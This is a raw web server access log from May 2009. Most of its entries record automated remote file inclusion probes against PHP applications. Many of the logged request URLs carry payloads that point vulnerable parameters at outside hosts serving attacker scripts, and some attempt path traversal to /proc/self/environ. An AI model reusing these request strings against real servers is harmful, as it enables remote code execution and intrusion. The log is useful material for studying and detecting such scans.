217.199.222.19 - - [23/May/2009:04:24:33 -0400] "GET /logs/?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:04:24:39 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:04:24:39 -0400] "GET /logs/error_log.Q109012600%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:04:24:40 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:04:24:41 -0400] "GET /logs/error_log.Q109012600//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:04:24:41 -0400] "GET /logs/access_log.Q109011800//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:24:42 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:04:24:55 -0400] "GET /logs/access_log.Q109011800%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:04:25:02 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:04:25:02 -0400] "GET /logs/error_log.Q109012600//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:04:25:02 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:04:25:08 -0400] "GET /logs/access_log.Q109011800//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:04:25:15 -0400] "GET /logs/error_log.Q109012600//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:04:25:21 -0400] "GET /logs/access_log.Q109011800//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.94.155.59 - - [23/May/2009:04:25:31 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
203.94.155.59 - - [23/May/2009:04:25:31 -0400] "GET /logs/access_log.Q109051200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
88.191.103.144 - - [23/May/2009:04:26:42 -0400] "GET /logs/access_log.Q108111500///vwar/backup/errors.php?error=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.825"
69.172.92.14 - - [23/May/2009:04:27:14 -0400] "GET /logs/access_log.Q108091400///vwar/backup/errors.php?error=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
69.172.92.14 - - [23/May/2009:04:27:15 -0400] "GET ///vwar/backup/errors.php?error=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.803"
69.172.92.14 - - [23/May/2009:04:27:16 -0400] "GET /logs///vwar/backup/errors.php?error=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
209.59.12.99 - - [23/May/2009:04:27:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [23/May/2009:04:28:08 -0400] "GET /logs/access_log.Q109011800//includes/include_once.php?include_file=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
123.143.98.5 - - [23/May/2009:04:28:11 -0400] "GET //includes/include_once.php?include_file=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
123.143.98.5 - - [23/May/2009:04:28:11 -0400] "GET /logs//includes/include_once.php?include_file=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
123.143.98.5 - - [23/May/2009:04:28:12 -0400] "GET /logs/error_log.Q108041500//includes/include_once.php?include_file=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
80.55.171.90 - - [23/May/2009:04:28:33 -0400] "GET //oneadmin/calendar/samplecalendar.php?path[docroot]=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt?????? HTTP/1.1" 404 235 "-" "libwww-perl/5.821"
80.55.171.90 - - [23/May/2009:04:28:33 -0400] "GET /logs//oneadmin/calendar/samplecalendar.php?path[docroot]=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt?????? HTTP/1.1" 404 240 "-" "libwww-perl/5.821"
80.55.171.90 - - [23/May/2009:04:28:33 -0400] "GET /logs/error_log.Q109011200//oneadmin/calendar/samplecalendar.php?path[docroot]=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt?????? HTTP/1.1" 404 261 "-" "libwww-perl/5.821"
80.55.171.90 - - [23/May/2009:04:28:56 -0400] "GET /logs/error_log.Q109010500//oneadmin/calendar/samplecalendar.php?path[docroot]=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt?????? HTTP/1.1" 404 261 "-" "libwww-perl/5.821"
80.55.171.90 - - [23/May/2009:04:29:41 -0400] "GET /logs/error_log.Q109020900//oneadmin/calendar/samplecalendar.php?path[docroot]=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt?????? HTTP/1.1" 404 261 "-" "libwww-perl/5.821"
208.113.248.144 - - [23/May/2009:04:29:42 -0400] "GET /logs//cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:04:29:42 -0400] "GET /logs/access_log.Q108062400//cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:04:29:42 -0400] "GET //cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:04:29:47 -0400] "GET /logs/access_log.Q108111500//cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
88.84.128.40 - - [23/May/2009:04:29:48 -0400] "GET /logs/access_log.Q108111500///vwar/backup/errors.php?error=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
200.32.100.130 - - [23/May/2009:04:30:36 -0400] "GET //e107/e107_handlers/secure_img_render.php?p=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:04:30:36 -0400] "GET /logs/access_log.Q109021500//e107/e107_handlers/secure_img_render.php?p=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:04:30:36 -0400] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:04:31:25 -0400] "GET /logs/access_log.Q109021500%20%20//e107/e107_handlers/secure_img_render.php?p=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:04:32:17 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:04:32:17 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:04:32:17 -0400] "GET /logs/access_log.Q109030500%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:04:32:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.55.171.90 - - [23/May/2009:04:32:51 -0400] "GET /logs/error_log.Q108101400%20//oneadmin/calendar/samplecalendar.php?path[docroot]=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt?????? HTTP/1.1" 404 262 "-" "libwww-perl/5.821"
121.173.130.41 - - [23/May/2009:04:36:23 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
121.173.130.41 - - [23/May/2009:04:36:31 -0400] "GET /logs/access_log.Q109051200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
205.153.56.10 - - [23/May/2009:04:37:23 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
66.249.72.114 - - [23/May/2009:04:37:29 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L20815D4B17A18700E14D04L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [23/May/2009:04:37:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.191.103.144 - - [23/May/2009:04:38:01 -0400] "GET /logs/error_log.Q108020900///squirrelcart/cart_content.php?cart_isp_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.825"
88.191.103.144 - - [23/May/2009:04:38:03 -0400] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.825"
88.191.103.144 - - [23/May/2009:04:38:03 -0400] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.825"
205.153.56.10 - - [23/May/2009:04:38:19 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
217.199.222.19 - - [23/May/2009:04:38:22 -0400] "GET /logs/?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:38:22 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:38:22 -0400] "GET /?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:38:26 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
213.165.80.16 - - [23/May/2009:04:39:09 -0400] "GET /logs/error_log.Q109051300/errors.php?error=http://www.jungle-productions.com/login/examples/safe2.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
213.165.80.16 - - [23/May/2009:04:39:09 -0400] "GET /errors.php?error=http://www.jungle-productions.com/login/examples/safe2.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
213.165.80.16 - - [23/May/2009:04:39:11 -0400] "GET /logs/errors.php?error=http://www.jungle-productions.com/login/examples/safe2.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
217.199.222.19 - - [23/May/2009:04:39:28 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:39:28 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 2495 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:39:28 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:04:39:32 -0400] "GET //dotproject//includes/db_connect.php?baseDir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:04:39:44 -0400] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:04:39:44 -0400] "GET /logs/access_log.Q108110900//dotproject//includes/db_connect.php?baseDir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:04:39:56 -0400] "GET //dotproject//includes/db_connect.php?baseDir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:04:40:01 -0400] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:04:40:01 -0400] "GET /logs/access_log.Q108110900//dotproject//includes/db_connect.php?baseDir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.172.92.14 - - [23/May/2009:04:40:10 -0400] "GET /logs/access_log.Q108111500///vwar/backup/errors.php?error=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
88.191.103.144 - - [23/May/2009:04:40:32 -0400] "GET /logs/access_log.Q108052400///squirrelcart/cart_content.php?cart_isp_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.825"
203.251.81.216 - - [23/May/2009:04:40:43 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:04:40:43 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:04:40:43 -0400] "GET /logs/error_log.Q109042700%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
213.165.80.16 - - [23/May/2009:04:40:57 -0400] "GET /logs/error_log.Q108081200/errors.php?error=http://www.jungle-productions.com/login/examples/safe2.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
77.221.130.2 - - [23/May/2009:04:41:07 -0400] "GET /logs/access_log.Q109050900/%20/contrib/yabbse/poc.php?sourcedir=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
77.221.130.2 - - [23/May/2009:04:41:07 -0400] "GET /logs/access_log.Q109050900/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
77.221.130.2 - - [23/May/2009:04:41:07 -0400] "GET /logs/access_log.Q109050900/%20/contrib/yabbse/poc.php?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 249 "-" "XXXXXX"
77.221.130.2 - - [23/May/2009:04:41:08 -0400] "GET /logs/access_log.Q109050900/%20/contrib/yabbse/poc.php?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 249 "-" "XXXXXX"
203.251.81.216 - - [23/May/2009:04:41:21 -0400] "GET /logs/access_log.Q108110900%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
77.221.130.2 - - [23/May/2009:04:41:26 -0400] "GET /%20/contrib/yabbse/poc.php?sourcedir=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
77.221.130.2 - - [23/May/2009:04:41:26 -0400] "GET /logs/%20/contrib/yabbse/poc.php?sourcedir=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
77.221.130.2 - - [23/May/2009:04:41:27 -0400] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
77.221.130.2 - - [23/May/2009:04:41:27 -0400] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
77.221.130.2 - - [23/May/2009:04:41:27 -0400] "GET /%20/contrib/yabbse/poc.php?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 222 "-" "XXXXXX"
77.221.130.2 - - [23/May/2009:04:41:27 -0400] "GET /logs/%20/contrib/yabbse/poc.php?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 227 "-" "XXXXXX"
77.221.130.2 - - [23/May/2009:04:41:27 -0400] "GET /%20/contrib/yabbse/poc.php?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 222 "-" "XXXXXX"
77.221.130.2 - - [23/May/2009:04:41:27 -0400] "GET /logs/%20/contrib/yabbse/poc.php?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 227 "-" "XXXXXX"
200.32.100.130 - - [23/May/2009:04:41:58 -0400] "GET //shoutbox/expanded.php?conf=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:04:41:58 -0400] "GET /logs//shoutbox/expanded.php?conf=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:04:41:58 -0400] "GET /logs/access_log.Q109021500%20%20//shoutbox/expanded.php?conf=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:04:42:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
84.88.48.1 - - [23/May/2009:04:42:38 -0400] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
84.88.48.1 - - [23/May/2009:04:42:38 -0400] "GET /images/login_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
84.88.48.1 - - [23/May/2009:04:42:39 -0400] "GET /images/login_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
84.88.48.1 - - [23/May/2009:04:42:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
203.251.81.216 - - [23/May/2009:04:42:43 -0400] "GET /common/db.php?commonpath=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:04:42:48 -0400] "GET /logs/common/db.php?commonpath=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:04:42:48 -0400] "GET /logs/access_log.Q109030500%20%20/common/db.php?commonpath=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:04:42:51 -0400] "GET /logs/access_log.Q109021500//shoutbox/expanded.php?conf=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.16.193.132 - - [23/May/2009:04:43:13 -0400] "GET //~computer/board/skin/zero_vote/ask_password.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
69.16.193.132 - - [23/May/2009:04:43:13 -0400] "GET /logs/access_log.Q109051200//~computer/board/skin/zero_vote/ask_password.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 321 "-" "Mozilla/5.0"
69.16.193.132 - - [23/May/2009:04:43:13 -0400] "GET /logs//~computer/board/skin/zero_vote/ask_password.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:04:43:33 -0400] "GET /logs/error_log.Q109050800%20%20/common/db.php?commonpath=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:04:43:38 -0400] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:04:43:38 -0400] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:04:43:38 -0400] "GET /logs/error_log.Q109051400%20%20/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
88.84.128.40 - - [23/May/2009:04:43:48 -0400] "GET /logs/error_log.Q108020900///squirrelcart/cart_content.php?cart_isp_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
88.84.128.40 - - [23/May/2009:04:43:48 -0400] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.803"
88.84.128.40 - - [23/May/2009:04:43:48 -0400] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
66.11.230.36 - - [23/May/2009:04:44:02 -0400] "GET /logs/error_log.Q108122800%20%20/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
67.43.0.140 - - [23/May/2009:04:44:39 -0400] "GET //popup_window.php?site_isp_root=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
67.43.0.140 - - [23/May/2009:04:44:39 -0400] "GET /logs//popup_window.php?site_isp_root=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
88.191.103.144 - - [23/May/2009:04:45:04 -0400] "GET /logs/access_log.Q108112300//?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.825"
88.191.103.144 - - [23/May/2009:04:45:04 -0400] "GET //?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.825"
88.191.103.144 - - [23/May/2009:04:45:04 -0400] "GET /logs//?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 2495 "-" "libwww-perl/5.825"
80.237.146.58 - - [23/May/2009:04:45:10 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:04:45:10 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:04:45:11 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:04:45:15 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:04:45:15 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:04:45:15 -0400] "GET /logs/access_log.Q108091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
88.84.128.40 - - [23/May/2009:04:45:22 -0400] "GET /logs/access_log.Q108112300//?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
88.84.128.40 - - [23/May/2009:04:45:22 -0400] "GET //?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
88.84.128.40 - - [23/May/2009:04:45:22 -0400] "GET /logs//?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 2495 "-" "libwww-perl/5.803"
69.16.193.132 - - [23/May/2009:04:45:37 -0400] "GET /logs/access_log.Q109051200%20%20//~computer/board/skin/zero_vote/ask_password.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 323 "-" "Mozilla/5.0"
85.10.128.219 - - [23/May/2009:04:45:46 -0400] "GET /logs/access_log.Q109051200/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
